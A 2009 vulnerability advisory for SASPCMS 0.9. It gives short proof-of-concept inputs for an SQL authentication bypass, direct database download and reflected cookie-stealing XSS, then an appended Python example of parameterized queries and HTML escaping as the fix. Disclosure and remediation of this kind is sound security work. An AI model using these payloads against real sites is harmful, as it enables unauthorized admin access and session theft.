SASPCMS Multiple Vulnerabilities

2009.04.09
Credit: bugreport
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##########################www.BugReport.ir########################################
#
# AmnPardaz Security Research Team
#
# Title: SASPCMS Multiple Vulnerabilities
# Vendor: http://www.lgasoft.com
# Vulnerable Version: 0.9 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
###################################################################################

####################
- Description:
####################

SASPCMS is an ASP Content Management System which uses MSSQL & Microsoft Access as its backend database.

####################
- Vulnerability:
####################

+-->Authentication Bypass

POC: ' or ''='
http://[URL]/saspcms/admin/default.asp

+-->Database Information Disclosure

POC: http://[URL]/saspcms/db/menu.mdb

+-->Cross Site Scripting (XSS). Reflected XSS attack in "default.asp" in "q" parameter.

POC: http://[URL]/saspcms/default.asp?q=<script>alert(document.cookie)</script>

####################
- PoC:
####################

It's possible for remote attackers to upload arbitrary files by using FCKEditor after logging in to the admin area.

http://www.bugreport.ir/64/exploit.htm

####################
- Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.

####################
- Credit:
####################

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
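The Solution section asks for input handling to be fixed. As an added example (not code from SASPCMS or from the advisory's authors), the Python below contrasts a login check built by string concatenation with a parameterized one, and shows output encoding for the reflected "q" value. Assumptions: the `users` schema and all function names are hypothetical, SQLite stands in for the MSSQL/Access backend, and the plaintext password column is a simplification.

```python
import html
import sqlite3

# The two inputs quoted in the advisory's Vulnerability section.
AUTH_POC = "' or ''='"
XSS_POC = "<script>alert(document.cookie)</script>"

def make_db():
    # Constructed stand-in for the CMS user store; schema is hypothetical and
    # the plaintext password column is a simplification for the demo.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-password')")
    return db

def login_concatenated(db, username, password):
    # Weak pattern: input is pasted into the SQL text, so quote characters
    # in the input change the structure of the WHERE clause.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(db, username, password):
    # Hardened pattern: values are bound as parameters, never parsed as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

def render_search_heading(q):
    # Output-encode the reflected "q" value before it is placed in HTML.
    return "<h2>Results for: " + html.escape(q, quote=True) + "</h2>"

if __name__ == "__main__":
    db = make_db()
    print("concatenated query accepts PoC: ", login_concatenated(db, AUTH_POC, AUTH_POC))
    print("parameterized query accepts PoC:", login_parameterized(db, AUTH_POC, AUTH_POC))
    print("encoded heading:", render_search_heading(XSS_POC))
```

In classic ASP the equivalent of the parameterized form is an `ADODB.Command` with bound parameters, and `Server.HTMLEncode` plays the role of `html.escape`.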

References:

http://seclists.org/bugtraq/2009/Apr/0074.html

